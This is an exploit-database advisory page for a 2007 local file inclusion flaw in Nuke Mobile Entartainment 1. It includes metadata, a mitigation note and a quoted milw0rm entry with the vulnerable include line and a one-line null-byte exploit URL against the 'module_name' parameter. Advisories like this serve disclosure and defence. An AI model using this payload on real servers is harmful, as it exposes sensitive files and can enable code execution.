header-logo
Suggest Exploit
vendor:
Nuke Mobile Entartainment
by:
BorN To K!LL
5.5
CVSS
MEDIUM
Local File Include
22
CWE
Product Name: Nuke Mobile Entartainment
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Nuke Mobile Entartainment <= (module_name) Local File Include Vuln

The vulnerability allows an attacker to include local files on the server by exploiting an insecure file inclusion function in the 'compatible.php' script. By manipulating the 'module_name' parameter, an attacker can access sensitive system files and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion functions. Additionally, restrict access to sensitive system files and directories.
Source

Exploit-DB raw data:

# Nuke Mobile Entartainment <= (module_name) Local File Include Vuln

# Script : Nuke Mobile Entartainment

# Version : 1

# Download : http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip

# BorN To K!LL <> AsbMay's Group ...

# Vuln. Code :

# include 'modules/'.$module_name.'compatibility/data/marque.data.php';

# ExploiT : [path]/data/compatible.php?module_name=[Local File]%00

# Greetings 2 : str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy

# milw0rm.com [2007-09-23]

Navigation

Suggest Exploit

Services By CQR